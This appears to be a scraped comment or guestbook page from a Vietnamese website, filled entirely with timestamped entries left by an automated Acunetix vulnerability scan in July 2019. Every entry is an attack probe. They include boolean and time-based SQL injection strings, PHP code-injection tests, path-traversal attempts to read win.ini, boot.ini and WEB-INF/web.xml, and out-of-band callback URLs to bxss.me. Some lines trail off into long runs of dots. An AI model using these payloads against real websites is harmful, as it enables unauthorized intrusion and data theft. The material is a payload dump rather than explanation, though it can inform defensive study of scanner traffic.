7/7/2019 11:27:03 PM

-1' OR 3*2<(0+5+339-339) --

ebvqvbya
7/7/2019 11:27:06 PM

-1' OR 3*2>(0+5+339-339) --

ebvqvbya
7/7/2019 11:27:11 PM

-1' OR 2+156-156-1=0+0+0+1 or 'hzpVgvZ8'='

ebvqvbya
7/7/2019 11:27:14 PM

-1' OR 3+156-156-1=0+0+0+1 or 'hzpVgvZ8'='

ebvqvbya
7/7/2019 11:27:17 PM

-1' OR 3*2<(0+5+156-156) or 'hzpVgvZ8'='

ebvqvbya
7/7/2019 11:27:21 PM

-1' OR 3*2>(0+5+156-156) or 'hzpVgvZ8'='

ebvqvbya
7/7/2019 11:27:24 PM

-1" OR 2+906-906-1=0+0+0+1 --

jccdhntr
7/7/2019 11:27:25 PM

;print(md5(acunetix_wvs_security_test));

ebvqvbya
7/7/2019 11:27:27 PM

-1" OR 3+906-906-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:27:29 PM

-1" OR 3*2<(0+5+906-906) --

jccdhntr
7/7/2019 11:27:30 PM

';print(md5(acunetix_wvs_security_test));$a='

ebvqvbya
7/7/2019 11:27:33 PM

-1" OR 3*2>(0+5+906-906) --

jccdhntr
7/7/2019 11:27:34 PM

";print(md5(acunetix_wvs_security_test));$a="

ebvqvbya
7/7/2019 11:27:35 PM

if(now()=sysdate(),sleep(75),0)/*'XOR(if(now()=sysdate(),sleep(75),0))OR'"XOR(if(now()=sysdate(),sleep(75),0))OR"*/

jccdhntr
7/7/2019 11:27:37 PM

${@print(md5(acunetix_wvs_security_test))}

ebvqvbya
7/7/2019 11:27:38 PM

(select(0)from(select(sleep(25)))v)/*'+(select(0)from(select(sleep(25)))v)+'"+(select(0)from(select(sleep(25)))v)+"*/

ebvqvbya
7/7/2019 11:27:41 PM

1 waitfor delay '0:0:25' --

jccdhntr
7/7/2019 11:27:41 PM

${@print(md5(acunetix_wvs_security_test))}\

ebvqvbya
7/7/2019 11:27:43 PM

Hp4TQPNV'; waitfor delay '0:0:25' --

ebvqvbya
7/7/2019 11:27:45 PM

1D9BizGO'); waitfor delay '0:0:25' --

ebvqvbya
7/7/2019 11:27:48 PM

0dPQRvKG')); waitfor delay '0:0:25' --

ebvqvbya
7/7/2019 11:27:50 PM

gahg2ztK';select pg_sleep(25); --

ebvqvbya
7/7/2019 11:27:53 PM

e42jVKIv');select pg_sleep(50); --

ebvqvbya
7/7/2019 11:27:55 PM

r9Jh9x5b'));select pg_sleep(50); --

pmhktvpm
7/7/2019 11:28:13 PM

../../../../../../../../../../windows/win.ini

pmhktvpm
7/7/2019 11:28:16 PM

../../../../../../../../../../boot.ini

pmhktvpm
7/7/2019 11:28:24 PM

../../../../../../../../../../windows/win.ini.jpg

jccdhntr
7/7/2019 11:28:27 PM

;print(md5(acunetix_wvs_security_test));

pmhktvpm
7/7/2019 11:28:28 PM

������������������������������������������������windows��win.ini

jccdhntr
7/7/2019 11:28:31 PM

';print(md5(acunetix_wvs_security_test));$a='

pmhktvpm
7/7/2019 11:28:32 PM

................windowswin.ini

jccdhntr
7/7/2019 11:28:35 PM

";print(md5(acunetix_wvs_security_test));$a="

pmhktvpm
7/7/2019 11:28:36 PM

..\..\..\..\..\..\..\..\windows\win.ini

pmhktvpm
7/7/2019 11:28:39 PM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

jccdhntr
7/7/2019 11:28:39 PM

${@print(md5(acunetix_wvs_security_test))}

jccdhntr
7/7/2019 11:28:44 PM

${@print(md5(acunetix_wvs_security_test))}\

pmhktvpm
7/7/2019 11:28:45 PM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

pmhktvpm
7/7/2019 11:28:48 PM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

pmhktvpm
7/7/2019 11:28:51 PM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

pmhktvpm
7/7/2019 11:28:55 PM

WEB-INF/web.xml

pmhktvpm
7/7/2019 11:29:01 PM

WEB-INF\web.xml

lbiqycas
7/7/2019 11:29:01 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

lbiqycas
7/7/2019 11:29:03 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

lbiqycas
7/7/2019 11:29:07 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

lbiqycas
7/7/2019 11:29:12 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx/.

lbiqycas
7/7/2019 11:29:44 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

lbiqycas
7/7/2019 11:29:46 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

lbiqycas
7/7/2019 11:29:49 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

lbiqycas
7/7/2019 11:29:51 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx/.

iebaikoh
7/7/2019 11:29:54 PM

http://hitlmpvWVtHiC.bxss.me/

iebaikoh
7/7/2019 11:30:11 PM

http://hitHSSx6zT8d0.bxss.me/

iebaikoh
7/7/2019 11:30:26 PM

http://hitBNcVFasmlb.bxss.me/

rkndaucn
7/7/2019 11:30:27 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

lbiqycas
7/7/2019 11:30:27 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

lbiqycas
7/7/2019 11:30:30 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

rkndaucn
7/7/2019 11:30:31 PM

1'"

rkndaucn
7/7/2019 11:30:33 PM

\

rkndaucn
7/7/2019 11:30:36 PM

1����

lbiqycas
7/7/2019 11:30:36 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

iebaikoh
7/7/2019 11:30:38 PM

http://hitbBnVF1gClj.bxss.me/

rkndaucn
7/7/2019 11:30:39 PM

@@GUIXI

lbiqycas
7/7/2019 11:30:40 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx/.

rkndaucn
7/7/2019 11:30:45 PM

JyI=

rkndaucn
7/7/2019 11:30:48 PM

�'�"

iebaikoh
7/7/2019 11:30:49 PM

http://hitCUazaBhMqI.bxss.me/

rkndaucn
7/7/2019 11:30:52 PM

�''�""

rkndaucn
7/7/2019 11:30:55 PM

(select convert(int,CHAR(65)))

ebvqvbya
7/7/2019 11:30:56 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:31:00 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

iebaikoh
7/7/2019 11:31:01 PM

http://hitxubmOHRroO.bxss.me/

ebvqvbya
7/7/2019 11:31:02 PM

-1 OR 2+323-323-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:31:09 PM

-1 OR 3+323-323-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:31:13 PM

-1 OR 3*2<(0+5+323-323) --

iebaikoh
7/7/2019 11:31:13 PM

http://hitXLf0FDQ9UM.bxss.me/

ebvqvbya
7/7/2019 11:31:15 PM

-1 OR 3*2>(0+5+323-323) --

ebvqvbya
7/7/2019 11:31:20 PM

-1 OR 2+887-887-1=0+0+0+1

lbiqycas
7/7/2019 11:31:20 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:31:23 PM

-1 OR 3+887-887-1=0+0+0+1

lbiqycas
7/7/2019 11:31:25 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

ebvqvbya
7/7/2019 11:31:26 PM

-1 OR 3*2<(0+5+887-887)

iebaikoh
7/7/2019 11:31:27 PM

http://hitSvbzfMBAYW.bxss.me/

ebvqvbya
7/7/2019 11:31:28 PM

-1 OR 3*2>(0+5+887-887)

lbiqycas
7/7/2019 11:31:29 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

ebvqvbya
7/7/2019 11:31:31 PM

-1' OR 2+388-388-1=0+0+0+1 --

lbiqycas
7/7/2019 11:31:31 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx/.

ebvqvbya
7/7/2019 11:31:34 PM

-1' OR 3+388-388-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:31:36 PM

-1' OR 3*2<(0+5+388-388) --

iebaikoh
7/7/2019 11:31:38 PM

http://hitxwgF4NqNMC.bxss.me/

pmhktvpm
7/7/2019 11:31:39 PM

../../../../../../../../../../windows/win.ini

ebvqvbya
7/7/2019 11:31:40 PM

-1' OR 3*2>(0+5+388-388) --

pmhktvpm
7/7/2019 11:31:42 PM

../../../../../../../../../../boot.ini

ebvqvbya
7/7/2019 11:31:44 PM

-1' OR 2+65-65-1=0+0+0+1 or '8Kpcpa7p'='

pmhktvpm
7/7/2019 11:31:46 PM

../../../../../../../../../../windows/win.ini.jpg

ebvqvbya
7/7/2019 11:31:48 PM

-1' OR 3+65-65-1=0+0+0+1 or '8Kpcpa7p'='

pmhktvpm
7/7/2019 11:31:50 PM

������������������������������������������������windows��win.ini

ebvqvbya
7/7/2019 11:31:51 PM

-1' OR 3*2<(0+5+65-65) or '8Kpcpa7p'='

pmhktvpm
7/7/2019 11:31:53 PM

................windowswin.ini

ebvqvbya
7/7/2019 11:31:54 PM

-1' OR 3*2>(0+5+65-65) or '8Kpcpa7p'='

ebvqvbya
7/7/2019 11:31:57 PM

-1" OR 2+788-788-1=0+0+0+1 --

pmhktvpm
7/7/2019 11:31:57 PM

..\..\..\..\..\..\..\..\windows\win.ini

ebvqvbya
7/7/2019 11:32:00 PM

-1" OR 3+788-788-1=0+0+0+1 --

pmhktvpm
7/7/2019 11:32:02 PM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

ebvqvbya
7/7/2019 11:32:03 PM

-1" OR 3*2<(0+5+788-788) --

pmhktvpm
7/7/2019 11:32:06 PM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

ebvqvbya
7/7/2019 11:32:06 PM

-1" OR 3*2>(0+5+788-788) --

ebvqvbya
7/7/2019 11:32:09 PM

if(now()=sysdate(),sleep(87),0)/*'XOR(if(now()=sysdate(),sleep(87),0))OR'"XOR(if(now()=sysdate(),sleep(87),0))OR"*/

ukwvnddo
7/7/2019 11:32:10 PM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

pmhktvpm
7/7/2019 11:32:11 PM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

ebvqvbya
7/7/2019 11:32:12 PM

(select(0)from(select(sleep(29)))v)/*'+(select(0)from(select(sleep(29)))v)+'"+(select(0)from(select(sleep(29)))v)+"*/

lbiqycas
7/7/2019 11:32:13 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

pmhktvpm
7/7/2019 11:32:14 PM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

ebvqvbya
7/7/2019 11:32:15 PM

1 waitfor delay '0:0:29' --

lbiqycas
7/7/2019 11:32:17 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

ebvqvbya
7/7/2019 11:32:17 PM

NPGPPmQX'; waitfor delay '0:0:29' --

pmhktvpm
7/7/2019 11:32:18 PM

WEB-INF/web.xml

lbiqycas
7/7/2019 11:32:20 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

pmhktvpm
7/7/2019 11:32:20 PM

WEB-INF\web.xml

ebvqvbya
7/7/2019 11:32:21 PM

bXpFpenc'); waitfor delay '0:0:58' --

lbiqycas
7/7/2019 11:32:23 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx/.

ebvqvbya
7/7/2019 11:32:24 PM

DhL6rFEK')); waitfor delay '0:0:58' --

ukwvnddo
7/7/2019 11:32:25 PM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

ebvqvbya
7/7/2019 11:32:27 PM

NGkVG0QK';select pg_sleep(58); --

ebvqvbya
7/7/2019 11:32:31 PM

DaqGZYJs');select pg_sleep(58); --

ebvqvbya
7/7/2019 11:32:35 PM

LtEm3AZS'));select pg_sleep(58); --

ukwvnddo
7/7/2019 11:32:45 PM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

rkndaucn
7/7/2019 11:32:48 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

rkndaucn
7/7/2019 11:32:51 PM

1'"

rkndaucn
7/7/2019 11:32:54 PM

\

rkndaucn
7/7/2019 11:32:56 PM

1����

ukwvnddo
7/7/2019 11:33:02 PM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

rkndaucn
7/7/2019 11:33:03 PM

@@hY9zN

rkndaucn
7/7/2019 11:33:07 PM

JyI=

rkndaucn
7/7/2019 11:33:09 PM

�'�"

ukwvnddo
7/7/2019 11:33:11 PM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

rkndaucn
7/7/2019 11:33:12 PM

�''�""

lbiqycas
7/7/2019 11:33:15 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

rkndaucn
7/7/2019 11:33:16 PM

(select convert(int,CHAR(65)))

lbiqycas
7/7/2019 11:33:24 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

ukwvnddo
7/7/2019 11:33:25 PM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lbiqycas
7/7/2019 11:33:27 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

lbiqycas
7/7/2019 11:33:31 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx/.

ukwvnddo
7/7/2019 11:33:34 PM

